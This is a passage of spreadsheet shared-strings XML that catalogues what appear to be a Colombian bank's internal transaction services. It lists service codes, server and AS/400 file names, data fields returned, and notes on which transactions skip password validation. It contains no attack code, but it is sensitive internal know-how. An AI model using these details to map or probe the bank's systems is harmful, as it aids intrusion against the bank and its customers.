    <t>0001-TD1:TRANSACCIONACUMULACIÓNYREVERSOPCO</t>
  </si>
  <si>
    <t>Esta acción registra la información de la compra o reverso enviada desde el canal en el archivo MATFFTXPCO, en este archivo se registrarán todas las transacciones que deben ser enviadas al centralizador de Puntos Colombia.</t>
  </si>
  <si>
    <t>0001-TN2:TRANSACCIONREDIFERIDOS</t>
  </si>
  <si>
    <t>Se crea una transacción en el servidor TN2 la cual se encarga de hacer las validaciones necesarias de trama, grabar log en el archivo TDCFFLGTCF y realiza el cambio de cuota en archivos de movimientos e inserta el registro en TDCFFRECON para ser enviado a FD en batch.</t>
  </si>
  <si>
    <t>0001–SRC:-RegistrodeFacturas</t>
  </si>
  <si>
    <t>Registro de Facturas</t>
  </si>
  <si>
    <t>0002-BTM:ANULACIONTRANSFERENCIABOTÓNBANCOLOMBIA</t>
  </si>
  <si>
    <t>Transacción que anula la transferencia, el débito de la comisión y el IVA que fue aplicado en la transacción 0001 del servidor BTM. 
Esta transacción es lanzada po la nube, una vez haya detectado un time out o una respuesta no esperada cuando se hizo la transferencia original en la TRX0001</t>
  </si>
  <si>
    <t>0002-C03:TRANSACCIONSERVICIOSPARACONSULTASACLIENTES</t>
  </si>
  <si>
    <t>Realiza la consulta del tipo y numero de documento de un cliente por medio de algun producto que este tenga asociado</t>
  </si>
  <si>
    <t>0002-DC1:ConsultaExtendidaDeUnaCuenta</t>
  </si>
  <si>
    <t>Consulta que solicita tipo y número de cuenta, tipo y número de documento y que como respuesta nos proporciona la siguiente información: Tipo de cuenta, Número de cuenta, Tipo de identificación, Número de identificación, Filler para uso futuro, Código del mensaje, Descripción del mensaje, Oficina dueña de la cuenta, Cuenta permite débitos, Cuenta permite créditos, Moneda, Fecha de apertura de la cuenta, Número de días de inactividad de la cuenta, Flag para cuenta cancelada, Fecha de cierre de la cuenta, Tipo Identificación Titular, Número de Identificación Titular, Número de cotitulares, Relación entre Cliente y Cuenta, Flags de la cuenta y Nombre Titular.</t>
  </si>
  <si>
    <t>0002-DI2:ConsultaExtendidaDeUnaCuenta-Mqi</t>
  </si>
  <si>
    <t>0002-DTB:TRN.CONSULTADATOSBASICOSDECLIENTE</t>
  </si>
  <si>
    <t>TRN. CONSULTA DATOS BASICOS DE CLIENTE</t>
  </si>
  <si>
    <t>0002-ECP:ANULARCRÉDITONEQUI-BANCOLOMBIA</t>
  </si>
  <si>
    <t>Transacción encargada de realizar anular la acreditación a cuenta Bancolombia por problemas de comunicación. Para esta operación se hace uso de los servicios expuestos por depósitos y finalmente se envía petición para que el registro se grabe en la nube.</t>
  </si>
  <si>
    <t>0002-GR1:TransacciónValidarDatosBeneficiario</t>
  </si>
  <si>
    <t>Transacción validar datos beneficiario antes de crear el giro.</t>
  </si>
  <si>
    <t>0002-GR1:ValidarDatosBeneficiario</t>
  </si>
  <si>
    <t>0002-MT5:TRANSACCIONADMINISTRATIVA800ISOLOGOFF</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite armar la respuesta de desconexion a Aunthentic. </t>
  </si>
  <si>
    <t>0002-NEQ:REVERSOTRANSFERENCIANEQUI</t>
  </si>
  <si>
    <t>REVERSO TRANSFERENCIA NEQUI</t>
  </si>
  <si>
    <t>0002-PCH:Consultacreditohipotecario</t>
  </si>
  <si>
    <t>Servidor de apoyo transaccion 0345 APP</t>
  </si>
  <si>
    <t>0002-RVC:ValidaciónToken</t>
  </si>
  <si>
    <t>Transacción para validar los Token u OTP para el proceso de enrolamiento medio de pago (Alianza Flypass)</t>
  </si>
  <si>
    <t>0002-SRC:ConsultaGenéricaFacturasInscritas</t>
  </si>
  <si>
    <t>Permite consultar las facturas que el cliente tiene es estado Inscrita (Finacle), Programadas (Finacle), Pendiente (Delay), Rechazadas (Delay)</t>
  </si>
  <si>
    <t>0002-SW2:ReenvíoDeMensajesABroker</t>
  </si>
  <si>
    <t>Recibe mensajes desde la opción de consulta de mensajería GPI disponible en el Driver, los cuales son enviados al Broker para que Broker haga el envío al Tracker de Swift. El Tracker de Swift entrega una respuesta que se le entrega al Producto.</t>
  </si>
  <si>
    <t>0003-DI2:ConsultaExtendidadeSaldos</t>
  </si>
  <si>
    <t>STI - Consulta en la que se solicita como campos obligatorios tipo y número de cuenta; como resultado se obtiene código y descripción del mensaje, oficina de la cuenta, si la cuenta permite debitos y/o créditos, tipo de moneda, fecha apertura de la cuenta, días de inactividad de la cuenta, flag para cuenta cancelada, fecha cierre de la cuenta, tipo y número de identificación, número de cotitulares, relación entre cliente y cuenta, flags de la cuenta, nombre del titular de la cuenta, signo y valor de: Cupo de sobregiro, saldo efectivo, saldo en canje, saldo disponible, saldo en cuentas por cobrar, saldo bloqueado, saldo en canje al inicio del día, saldo efectivo al inicio del día.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.1_Productos-CuentasDeAhorroYCorriente</t>
  </si>
  <si>
    <t>0003-DTG:SERVIDORCONSULTADATOSGENERALESDELCLIENTE</t>
  </si>
  <si>
    <t>TX a través de la cual se realiza el consumo del servicio "ConsultarDatosCliente2.0" en MDM ( a través del integrador ), particularmente la operación de consulta de datos Generales.</t>
  </si>
  <si>
    <t>0003-GR1:CrearGiro</t>
  </si>
  <si>
    <t>Transacción que perminte crear un giro</t>
  </si>
  <si>
    <t>0003-SW2:ReenvíoDeMensajesAProducto</t>
  </si>
  <si>
    <t>Recibe mensajes desde la opción de consulta de mensajería GPI disponible en el Driver, el Driver le envía al Producto la respuesta que fue recibida desde el Tracker de Swift en el primer intento.</t>
  </si>
  <si>
    <t>0003-TC1:COMPRAOPAGODEIMPUESTOCONTDCPORPSE</t>
  </si>
  <si>
    <t xml:space="preserve">COMPRA O PAGO DE IMPUESTO CON TARJETA DE CRÉDITO POR PSE
</t>
  </si>
  <si>
    <t>0003-TC2:LISTARTARJETASDECREDITOCOBRANZAS</t>
  </si>
  <si>
    <t xml:space="preserve">La transacción 0003 (Flujo: FLSOL_TC2_0003) permite realizar Listar las tarjetas de crédito Cobranzas cumpliendo con unos criterios básicos, consiste que a través del documento y el tipo de documento pueda verificar que tarjetas possee los clientes basado en sus estados según como este en Firsdata o en la sabana de datos, este valida según el canal y el código de transacción parametrizados (Archivo TDCFFPASIS), el sistema procede a realizar la transacción, la diferencia con los otros listar es que este en la respuesta devuelve mas campos como por ejemplo: FECEMISION, FECHACANCE, DIASMORA, SALDOCAPES, SALDOCADOL, INTCORRPES, INTCORRDOL, INTMORAPES, INTMORADOL, SALOTRCPES, SALOTRCDOL, OFICINA, NIDAMPARA, BIN.
</t>
  </si>
  <si>
    <t>0004-CI7:ConfirmaciónDriverRecepciónMensajeCIB</t>
  </si>
  <si>
    <t>Transacción 0004 del servidor  CI7.
CIB recibe confirmación de recepción de mensajería SWIFT GPI por parte de driver.</t>
  </si>
  <si>
    <t>0004-DTU:TRANSACCIÓNRECUPERARDATOSUBICACIÓN</t>
  </si>
  <si>
    <t>TX a través de la cual se realiza el consumo del servicio "ConsultarDatosCliente2.0" en MDM ( a través del integrador ), particularmente la operación de consulta de datos Ubicacion</t>
  </si>
  <si>
    <t>0004-GR1:PagarGiro</t>
  </si>
  <si>
    <t>Transacción para efectuar el pago del giro</t>
  </si>
  <si>
    <t>0004-GR1:TransacciónPagarGiro</t>
  </si>
  <si>
    <t>0004-RVC:EnrolamientoMediodepagoCredito</t>
  </si>
  <si>
    <t>Enrolamiento medio de pago para recaudo electrónico vehiculara (Alianza Flypass)</t>
  </si>
  <si>
    <t>0004-TC1:REVERSODEPAGODEIMPUESTOCONTDCPORPSE</t>
  </si>
  <si>
    <t xml:space="preserve">REVERSO DE PAGO DE IMPUESTO CON TARJETA DE CRÉDITO POR PSE
</t>
  </si>
  <si>
    <t>0004-TC2:LISTARTARJETASDECREDITOKIOSCOS</t>
  </si>
  <si>
    <t>La transacción 0004 (Flujo: FLSOL_TC2_0004) permite realizar Listar las tarjetas de crédito cumpliendo con unos criterios básicos, consiste que a través del documento y el tipo de documento pueda verificar que tarjetas possee los clientes basado en sus estados según como este en Firsdata o en la sabana de datos, este valida según el canal y el código de transacción parametrizados (Archivo TDCFFPASIS), el sistema procede a realizar la transacción, de lo contrario el sistema sigue con el flujo de error.</t>
  </si>
  <si>
    <t>0004-TCF:TRANSACCIONCONSULTAINFORMACIONDEAVANCES</t>
  </si>
  <si>
    <t>Transacción que consulta los avances de tarjeta de crédito de un cliente, Esta transacción entregara en una trama los avances que se hayan realizados en los últimos tres meses, permitiendo filtro por numero de tarjeta de crédito y por rango de fechas.
Tiene la opción de consultar los avances realizados por terceros, o avances realizados a terceros.</t>
  </si>
  <si>
    <t>0005-BV1:CONSULTADETALLEPRESTAMO</t>
  </si>
  <si>
    <t>Servicio de STi para la consulta de prestamos detalladamente.</t>
  </si>
  <si>
    <t>0005-CI7:RecepciónMensajeRespuestaTrackerCIB</t>
  </si>
  <si>
    <t xml:space="preserve">Transacción 0005 del servidor CI7.
CIB recibe mensajería de respuesta Tracker SWIFT GPI  a través de Driver.
</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.9_Productos-ComercioExterior</t>
  </si>
  <si>
    <t>0005-GR1:Cancelacióngiro</t>
  </si>
  <si>
    <t>Transacción encargada de cancelar el giro</t>
  </si>
  <si>
    <t>0006-GR1:TransaccionSolicitudCancelarGiro</t>
  </si>
  <si>
    <t>Transacción para solicitar PIN para posteriormente efectuar la cancelación del Giro.</t>
  </si>
  <si>
    <t>0006-GR1:TransacciónSolicitudCancelarGiro</t>
  </si>
  <si>
    <t>0006-TC2:ConsultaDetalleTdc1A1</t>
  </si>
  <si>
    <t xml:space="preserve">La transacción 0006 (CONSULTA DETALLE TDC 1 A 1) del servidor TCF, permite listar el detalle de la tarjeta de crédito de un cliente. Si un cliente tiene varias tarjetas, mediante esta transacción tendrá la opción de consultar el detalle de la tarjeta de crédito que sea emitida desde el canal consumidor del servicio. </t>
  </si>
  <si>
    <t>0007-BV1:CONSULTADEPRESTAMOSPORCONVENIOSARCHIVO</t>
  </si>
  <si>
    <t xml:space="preserve">Actualmente, los core de productos se encuentran operando en máquinas ISeries – AS/400, bajo el sistema operativo OS/400; es muy común encontrar dentro del esquema actual programas de diferentes aplicativos que consultan directamente información de tablas de otros aplicativos, generando alto acoplamiento entre los programas de las diferentes aplicaciones y por ende problemas de mantenibilidad que se traducen en altos costos en las iniciativas.
Para el caso de cartera, existen un gran número programas de otras aplicaciones diferentes que requieren obtener un informe de los préstamos por convenios de un NIT específico para lo cual se requiere consulta el archivo LMBAL por el campo LMMAU3,con esta transaccion se busca notificar al core de cartera para la generacion del informe,posteriormente en un flujo post se genera la sabana de informacion requerida por el cosnumidor.
</t>
  </si>
  <si>
    <t>0007-GR1:RenvioPINGiro</t>
  </si>
  <si>
    <t>Transacción encargada de reeviar el PIN.</t>
  </si>
  <si>
    <t>0008-ALE:Grabarespuestaenvioalertassms</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.A_Otros</t>
  </si>
  <si>
    <t>0008-GR1:ReintentosProspectos</t>
  </si>
  <si>
    <t>Transacción que permite reintentar la creación de los prospectos en SAP-CRM</t>
  </si>
  <si>
    <t>0009-BV1:CONSULTADEPRESTAMOSPORCLIENTE</t>
  </si>
  <si>
    <t>Servicio de cartera encargado de retornar todos los prestamos de un cliente específico</t>
  </si>
  <si>
    <t>0009-BVA:CONSULTASPRESTAMOSPORCLIENTE</t>
  </si>
  <si>
    <t>Consultas prestamos por identificación del cliente , esta transacción es para consumo interno de iSeries</t>
  </si>
  <si>
    <t>0009-GR1:ConsultaGirosFecha</t>
  </si>
  <si>
    <t>Transacción que permite consultar los giros en un rango de fechas.</t>
  </si>
  <si>
    <t>0010-SG2:EnviodeAlertas</t>
  </si>
  <si>
    <t>Transaccion para exponer el envio de alertas y notificciones</t>
  </si>
  <si>
    <t>0011-BV1:CONSULTACLASIFICACIÓNCARTERA</t>
  </si>
  <si>
    <t>Esta transacción soporta las consultas de Clasificación de Cartera (XMOD).</t>
  </si>
  <si>
    <t>0012-DC1:ListarCuentasDeClienteEnTrama</t>
  </si>
  <si>
    <t>Transacción que solicita como datos de entrada Número de Página a Devolver, Número de Registros por Página, Tipo de Identificación del Titular, Nro. de Identificación del Titular, Indicador de solo Titular Principal, Indicador de omitir Cuentas Canceladas, Tipo de Cuenta a Consultar, Número de Cuenta a Consultar, Oficina Dueña de la Cuenta, Cuenta permite Débitos, Cuenta permite Créditos, Marcas de las Cuentas, Para uso futuro y que como respuesta proporciona la siguiente información: Número de Página a Devolver, Número de Registros por Página, Tipo de Identificación del Titular, Nro. de Identificación del Titular, Indicador de solo Titular Principal, Indicador de omitir Cuentas Canceladas, Tipo de Cuenta a Consultar, Número de Cuenta a Consultar, Oficina Dueña de la Cuenta, Cuenta permite Débitos, Cuenta permite Créditos, Marcas de las Cuentas, Para uso futuro, Código de Respuesta y Descripción de Respuesta; donde además de cada una de las cuentas también se anexa la siguiente información: Tipo de Cuenta a Consultar, Número de Cuenta, Código de la Oficina Dueña de la Cuenta, Cuenta permite Débitos, Cuenta permite Créditos, Moneda, Fecha de Apertura de la Cuenta, Número de días de Inactividad de la Cuenta, Indicador de Cuenta Cancelada, Fecha de cierre de la Cuenta, Relación entre Cliente y Cuenta, Marcas de las Cuentas, Signo del Cupo de Sobregiro, Valor del Cupo de Sobregiro, Signo del Saldo Efectivo de la Cuenta, Saldo Efectivo de la Cuenta, Signo del Saldo en Canje de la Cuenta, Saldo en Canje de la Cuenta, Signo del Saldo Disponible de la Cuenta, Saldo Disponible de la Cuenta, Signo del Saldo en Cuenta por Cobrar, Saldo en Cuenta por Cobrar, Signo del Saldo Bloqueado, Saldo Bloqueado, Signo del Saldo en Canje al Inicio del Día, Saldo en Canje al Inicio del Día, Signo del Saldo Efectivo al Inicio del Día, Saldo Efectivo al Inicio del Día, Dias Sobregiro, Signo del Saldo de disponible del Cupo de Sobregiro, Saldo de disponible del Cupo de Sobregiro, Signo Interés normales, Interés normales, Signo Interés en suspensión, Interés en suspensión, Clasificación Cartera - Para ctas Corrientes y Para uso futuro/Info de la Cuenta.</t>
  </si>
  <si>
    <t>0014-DI2:SERVIDORINTERFÁZDEPOSITOS-MQIDM2</t>
  </si>
  <si>
    <t>SERVIDOR INTERFÁZ DEPOSITOS - MQI DM2</t>
  </si>
  <si>
    <t>0014-DI2:ServidorInterfazDepositosMQI-DI2</t>
  </si>
  <si>
    <t>Servicio que solicita como campos obligatorios de entrada número de página, tipo y número de documento y consumidor. Como respuesta se obtiene código y descripción del error, total de registros retornados y cada uno de los movimientos realizados se puede apreciar la siguiente información (fecha de la afectación contable, fecha de ingreso al sistema, nombre y código de Trx movimiento, código de la oficina, valor total, tipo de Trx,   referencias, tipo y número de cuenta asociada).</t>
  </si>
  <si>
    <t>0014-DP1:ConsultaDeMovimientosCuentaDepositos</t>
  </si>
  <si>
    <t>STI - Servicio que requiere como campos obligatorios de entrada número de página, tipo y número de documento, id del consumidor. Como respuesta se obtiene código y mensaje de error, total de registros retornados, y en caso de ser afirmativo que haya movimientos tenemos: fehca de la atectación contable, fecha de ingreso al sistema, código y Trx del movimiento, código de la oficina, valor total, tipo de Trx, referencias, tipo y número de cuenta asociada.</t>
  </si>
  <si>
    <t>0015-TC2:CREACIÓNDETARJETADECRÉDITOVIRTUAL</t>
  </si>
  <si>
    <t>El servicio se encarga de la creación de una tarjeta virtual de la cual se podrá hacer uso inmediato.</t>
  </si>
  <si>
    <t>0018-TF4-CambiodefechaservidorTEF</t>
  </si>
  <si>
    <t>Realiza el cambio de fecha en el servidor TF4, enviando a cada job parametrizado en el servidor la transacción administrativa de cambio de fecha</t>
  </si>
  <si>
    <t>0019-TF4-APERTURAYCIERREDEARCHIVOSSERVIDORTEF</t>
  </si>
  <si>
    <t>Realiza el cierre y apertura de los archivos usados por los servidores del TEF en STI</t>
  </si>
  <si>
    <t>0030-TDP:ConsultaDeSaldoTarjetasPrepago</t>
  </si>
  <si>
    <t>Consulta de Saldo</t>
  </si>
  <si>
    <t>0032-TDP:CambiodePinPrepagoFirstData</t>
  </si>
  <si>
    <t>La transacción envía a First Data la petición para cambiar el pin de las tarjetas prepago</t>
  </si>
  <si>
    <t>0035-SG2-CONSULTARTOPESPCC</t>
  </si>
  <si>
    <t>Permite consultar los topes personalizados y tope banco de un cliente</t>
  </si>
  <si>
    <t>0037-SG2-VALIDARYACUMULARTOPESPCC</t>
  </si>
  <si>
    <t>Permite acumular tanto topes personalizados como tope banco</t>
  </si>
  <si>
    <t>0042-TC2:ConsultadeSaldosConsolidados</t>
  </si>
  <si>
    <t xml:space="preserve">La transacción 0042 permite realizar Listar las tarjetas de crédito PYMES cumpliendo con unos criterios básicos, consiste que a través del documento y el tipo de documento pueda verificar que tarjetas possee los clientes basado en sus estados según como este en Firsdata ya que esta transacción por ahora solo funciona con Firstdata, este valida según el canal y el código de transacción parametrizados (Archivo TDCFFPASIS), el sistema procede a realizar la transacción, de lo contrario el sistema sigue con el flujo de error.
</t>
  </si>
  <si>
    <t>0045-AU8:HISTORICODEPAGOS</t>
  </si>
  <si>
    <t>El cliente pagador puede consultar los pagos que ha realizado por cualquier medio virtual.</t>
  </si>
  <si>
    <t>0046-AU8:HISTORICODEPAGOSPROGRAMADOS</t>
  </si>
  <si>
    <t>El cliente pagador podrá consultar el estado de sus pagos programados sean exitosos o rechazados por medio del asesor telefónico.</t>
  </si>
  <si>
    <t>0051-TF4:CancelacionCuenta</t>
  </si>
  <si>
    <t>Actualización a estado cancelado en el archivo tiempo real (SCIFFSALDO) de una cuenta especifica. Esta funcionalidad esta desplegada en los servidores TF4 y TF8</t>
  </si>
  <si>
    <t>0051-TF8:CancelacionCuenta</t>
  </si>
  <si>
    <t>0052-TF4:AperturadeCuenta</t>
  </si>
  <si>
    <t>Generación e inscripción en el archivo tiempo real (SCIFFSALDO) de cuentas nuevas. Esta funcionalidad esta desplegada en los servidores TF4 y TF8</t>
  </si>
  <si>
    <t>0052-TF8:AperturaCuenta</t>
  </si>
  <si>
    <t>0053-AU8:MOVIMIENTOTRANSACCIONALDECONVENIO</t>
  </si>
  <si>
    <t>El cliente recaudador puede consultar que pagos se han realizado a los convenios propios.</t>
  </si>
  <si>
    <t>0060-SCB:Transacción_Pago_De_Recaudos</t>
  </si>
  <si>
    <t>Esta transaccion permite, generar o consiliar el pago de Recuados; y evitar envio de alerta exitosa cuando la transaccion se reverso por Timeout.</t>
  </si>
  <si>
    <t>0062-AU8:PAGODEFACTURASRECAUDOS-IVRFINACLE</t>
  </si>
  <si>
    <t>El cliente pagador podrá realizar el pago de facturas por el canal de telefónico de audiorespuesta ingresando el convenio y referencia de la factura a pagar.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.5.2_Canales-Telefonico</t>
  </si>
  <si>
    <t>0062-AUA:PAGOIVRENRUTADOR</t>
  </si>
  <si>
    <t>Servicio que se encarga de enrutar la transacción al legado o finacle dependiendo del indicador de base de datos que llega en la solicitud para así registrar el pago de facturas.</t>
  </si>
  <si>
    <t>0062-DC5:ListadoCuentasDepósitosClientesenTrama</t>
  </si>
  <si>
    <t xml:space="preserve">Mediante este servicio se obtiene información  de las cuentas de ahorro y corriente de un  cliente especifico en Depósitos, para lo cual se consultan los archivos: DBAL, CXREF, DPLAN y CNAME por los campos: CNNOSS, CNCDTI. Este servicio permite consultar las siguientes características de la cuenta:
-	Código de Aplicación
-	Número de Cuenta                  
-	Relación entre el cliente y la Cta: Titular (T), Cotitular (C)
-	Estado de la Cuenta
-	Descripción del Estado  
-	Código SubEstado
-	Descripción SubEstado                    
-	Código de Plan
-	Descripción del Plan
-	Marcación GMF
-	Número de Sucursal
-	Dias de Inactividad
-	Fecha de Apertura
-	Fecha de Cierre
-	Permite Debito (Y/N)
-	Permite Credito (Y/N)                  
-	Número de Cotitulares    
-	Permite Cambio de Plan (Y/N)
-	Cuenta Pendiente Activación (Y/N)  </t>
  </si>
  <si>
    <t>0062-DI5:ListadoCuentasDepósitosClientesenTrama</t>
  </si>
  <si>
    <t xml:space="preserve">Mediante este servicio se obtiene información de las cuentas de ahorro y corriente de un cliente especifico en Depósitos, para lo cual se consultan los archivos: DBAL, CXREF, DPLAN y CNAME por los campos: CNNOSS, CNCDTI. Este servicio permite consultar las siguientes características de la cuenta:
</t>
  </si>
  <si>
    <t>0065-DC5:MANTENIMIENTOCUENTADEPOSITOS</t>
  </si>
  <si>
    <t>El mantenimiento de cuentas son un conjunto de capacidades destinadas a modificar datos específicos de las cuentas de ahorros y corrientes. Dentro de los datos susceptibles a modificaciones tenemos la sucursal dueña de la cuenta, el asesor o responsable comercial, el plan, etc. Otro tipo de mantenimiento hace referencia a aquellas acciones propias de los procesos de depósitos, como por ejemplo habilitar una cuenta que completó exitosamente su proceso de apertura.</t>
  </si>
  <si>
    <t>0065-DI5:MANTENIMIENTOCUENTADEPOSITOS</t>
  </si>
  <si>
    <t xml:space="preserve">El mantenimiento de cuentas son un conjunto de capacidades destinadas a modificar datos específicos de las cuentas de ahorros y corrientes. Dentro de los datos susceptibles a modificaciones tenemos la sucursal dueña de la cuenta, el asesor o responsable comercial, el plan, etc. Otro tipo de mantenimiento hace referencia a aquellas acciones propias de los procesos de depósitos, como por ejemplo habilitar una cuenta que completó exitosamente su proceso de apertura.
</t>
  </si>
  <si>
    <t>0070-TF8:TRANSACCIÓNBLOQUEO-DESBLOQUEOSALDOBOLSILLO</t>
  </si>
  <si>
    <t>TRANSACCIÓN BLOQUEO-DESBLOQUEO SALDO BOLSILLO</t>
  </si>
  <si>
    <t>0114-SV9:RetornaRutaNfs</t>
  </si>
  <si>
    <t>Esta transacción STI se encarga de retornar una ruta NFS a WAS en la cual se dejará un archivo que corresponde al lote de facturación de un cliente recaudador SVE, la ruta se encuentra guardada en la dtaara WWWDTANFS.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.5.4_Canales-Internet</t>
  </si>
  <si>
    <t>0115-SV9:RecibirArchivoDeRecaudos</t>
  </si>
  <si>
    <t>El cliente recaudador Sucursal Virtual Empresas deberá poder cargar el lote de archivos de facturación, cobros o novedades en los diferentes formatos a través de la opción de carga, para que los pagadores puedan realizar los pagos de las facturas pendientes por todos los canales habilitados.</t>
  </si>
  <si>
    <t>0117-AU4:ResgistroServicioAlertasyNotificaciones</t>
  </si>
  <si>
    <t>Esta transacción inscribe a cliente al servicio de alertas y notificaciones del Banco, insertando un registro en el archivo PCCFFDGAL con la información:
- Numero de Celular
- Correo
-  Tipo y Número de Cuenta.
Transacción habilitada para ser consumida con Clave por HW o TOKEN</t>
  </si>
  <si>
    <t>0118-AU4:InactivaciónServicioAlertasGDE</t>
  </si>
  <si>
    <t xml:space="preserve">Esta transacción inactiva al cliente en el servicio de alertas y notificaciones del Banco, actualizando el registro en el archivo PCCFFDGAL.
Transacción habilitada para ser consumida con Clave por HW o TOKEN
</t>
  </si>
  <si>
    <t>0119-AU4:ConsultaDeAlertasGDE</t>
  </si>
  <si>
    <t>La transacción retornas las alertas que tiene el cliente.
Basados en el servicio de transaversales PCCRALTR46.
La transacción cuanta con paginación en caso de gran cantidad de datos (mayor a 30000 caracteres)</t>
  </si>
  <si>
    <t>0121-AU4:ActualizacionDatosServicioAlertasGDE</t>
  </si>
  <si>
    <t xml:space="preserve">Esta transacción actualiza la información del cliente para servicio de alertas y notificaciones del Banco, modificando el registro del cliente en el archivo PCCFFDGAL con la información:
- Numero de Celular
- Correo
- Tipo y Número de Cuenta.
Transacción habilitada para ser consumida con Clave por HW o TOKEN
</t>
  </si>
  <si>
    <t>0148–AT3:TransaccionCambioPINMasterDebit</t>
  </si>
  <si>
    <t>Transaccion encargada de resolver las transacciones de MasterDebit que llegan por el servidor AT3</t>
  </si>
  <si>
    <t>0155-SVK:TRANSACCIÓNRECUPERARDATOSCLIENTESMDM</t>
  </si>
  <si>
    <t>TRANSACCIÓN RECUPERAR DATOS CLIENTES MDM</t>
  </si>
  <si>
    <t>0156-SVK:TRANSACCIÓNGESTIONARPROSPECTOCRM</t>
  </si>
  <si>
    <t>TRANSACCIÓN GESTIONAR PROSPECTO CRM</t>
  </si>
  <si>
    <t>0160-AU2:CONSULTAAVANCESVIRTUALESCONTDC-GDE</t>
  </si>
  <si>
    <t>Transacción que consulta los avances y depósitos virtuales realizados desde la SVP con TDC con operadora (Paso Asesor)</t>
  </si>
  <si>
    <t>0162-AU4:ConsultadeEst.ClaveeInt.Fallidos</t>
  </si>
  <si>
    <t>La transacción permite conocer el estado de la primera clave Banco del cliente así como sus intentos fallidos de autenticación desde el MATFFESTCL</t>
  </si>
  <si>
    <t>0163-AUD:MatrizTipoCliente</t>
  </si>
  <si>
    <t xml:space="preserve">La transacción permite conocer la clasificación del cliente para la atención personalizada del cliente en los diferentes BPO, en base a datos como ingreso de segunda clave, resultado de autenticación, información de clave dinámica, ley antitramites.
Toda la información mencionada anteriormente se obtiene de DB Banco o se envían al realizar el consumo de la transacción.
</t>
  </si>
  <si>
    <t>0165-AU0:AutenticacionSucursalTelefónica</t>
  </si>
  <si>
    <t>Permite realizar la autenticación de un cliente Bancolombia por medio del Contact Center haciendo uso de la encriptación por HW o Token OAUTH, adicional retorna información del cliente relaciona a sus productos de Ctas de Ahorro – Corriente, crédito hipotecario, fondos de inversión, tarjetas de crédito, cuenta fiduciaria, estado de primera – segunda clave, estado clave dinámica, ley anti-trámites, correo y numero de celular registrado en banco.</t>
  </si>
  <si>
    <t>0186-AU5:ConsultaHistóricoAperturaALM</t>
  </si>
  <si>
    <t xml:space="preserve">Esta transacción consulta el histórico del cliente para la apertura de cuentas ahorro a la mano, consultando las tablas de clientes BVCLFGFSLG, BVCFFGFSHO.
La consulta se puede hacer por número de celular, fecha, numero de celular y fecha-
Esta transacción no tiene validación de clave.
</t>
  </si>
  <si>
    <t>0200-C10:InscribirCuentasPaypal</t>
  </si>
  <si>
    <t>Esta transacción tiene como fin permitir permitir que un usuario inscriba su cuenta Paypal en Bancolombia y así porder realizar transacciones para traer dinero de Paypal a Banco.</t>
  </si>
  <si>
    <t>0201-C10:ConsultarCuentasPaypal</t>
  </si>
  <si>
    <t>Esta transacción tiene como fin, permitir al cliente verificar si ya se encuentra registrada su cuenta de Paypal en Bancolombia para poder realizar transacciones.</t>
  </si>
  <si>
    <t>0202-C10:DesvincularCuentasPaypal</t>
  </si>
  <si>
    <t>Esta transacción va a permitir al usuario que en el momento que lo requiera, eliminar el registro de la cuenta en Bancolombia.</t>
  </si>
  <si>
    <t>0203-C10:ConsultarNumeralesCambiarios</t>
  </si>
  <si>
    <t>Esta transacción tiene como fin mostrar al cliente los diferentes conceptos cambiaros de los que podrá asociar para la transacción que está realizando.</t>
  </si>
  <si>
    <t>0204-C10:Consultarcostocomisión</t>
  </si>
  <si>
    <t>Consulta la comisión que se le va a cobrar al cliente por transacción.</t>
  </si>
  <si>
    <t>0213-SV2:TRANSFERENCIASENTREBOLSILLOS</t>
  </si>
  <si>
    <t>Esta transaccion se utiliza para invocar el servicio de depositos dc4 0207 para transferir el dinero de un bolsillo a otro bolsillos dentro de una misma cuenta</t>
  </si>
  <si>
    <t>0221-AU2:LISTARTCBLOQUEADASTEMPORALMENTE</t>
  </si>
  <si>
    <t>Lista las TDC bloqueadas que tenga en cliente por medio de IVR</t>
  </si>
  <si>
    <t>0222-AU2:DESBLOQUEOTCPORIVR</t>
  </si>
  <si>
    <t>desbloqueo temporal por IVR</t>
  </si>
  <si>
    <t>0240-AU2:BloqueoDeTarjetaDeCrédito</t>
  </si>
  <si>
    <t>Se realiza el bloqueo de una tarjeta de crédito indicada por el cliente, por medio del consumo de la transacción 0006 del TF1.</t>
  </si>
  <si>
    <t>0240-AU6:BloqueoDeTarjetaDeCrédito</t>
  </si>
  <si>
    <t>0241-AU2:ConsultaBloqueoDeTdcPorFraude</t>
  </si>
  <si>
    <t>Permite realizar el bloque de la tarjeta de crédito por intento de fraude en el canal telefónico, realizando la validación de la clave cuando el cliente realiza el procedimiento por medio del IVR en caso contrario (Asesor) no se hace la validación de la autenticación.
Dentro del flujo la transacción valida que la tarjeta no sea parte de un piloto activo.</t>
  </si>
  <si>
    <t>0241-CI6:ConsultadeNumeralesCambiarios</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio permite realizar la consulta de los numerales cambiarios (Conceptos) habilitados de acuerdo al formulario cambiario, tipo de operación, tipo de persona, y canal por el cual el cliente  realiza la operación.
La transacción genera la información en una tabla intermedia, y posterior es consultada por un stored procedure quien recupera el listado de numerales cambiarios. Es importante indicar que la transacción está diseñada y desarrollada para consultar los numerales cambiarios y dejarlos en memoria del servidor WAS, es decir, no está diseñada para consultas con concurrencia. La transacción se desarrolló de esta manera, para mejorar la experiencia de usuario y tener velocidad en la carga de numerales y por una limitante del servidor SVE de 5000 caracteres.
</t>
  </si>
  <si>
    <t>0241-SVE:ConsultadeNumeralesCambiarios</t>
  </si>
  <si>
    <t>Este servicio permite realizar la consulta de los numerales cambiarios (Códigos para identificar operaciones de cambio), donde se consulta el tipo de operación, tipo de persona, y canal por el cual el cliente realiza la operación.
La transacción solicita al servidor CI6 generar la información en una tabla intermedia (WWWFFSVENU), y posterior es consultada por un stored procedure (Consulta ICR) quien recupera el listado de numerales cambiarios. Es importante indicar que la transacción está diseñada y desarrollada para consultar los numerales cambiarios y dejarlos en memoria del servidor WAS, es decir, no está diseñada para consultas con concurrencia. La transacción se desarrolló de esta manera, para mejorar la experiencia de usuario y tener velocidad en la carga de numerales y por una limitante del servidor SVE de 5000 caracteres.</t>
  </si>
  <si>
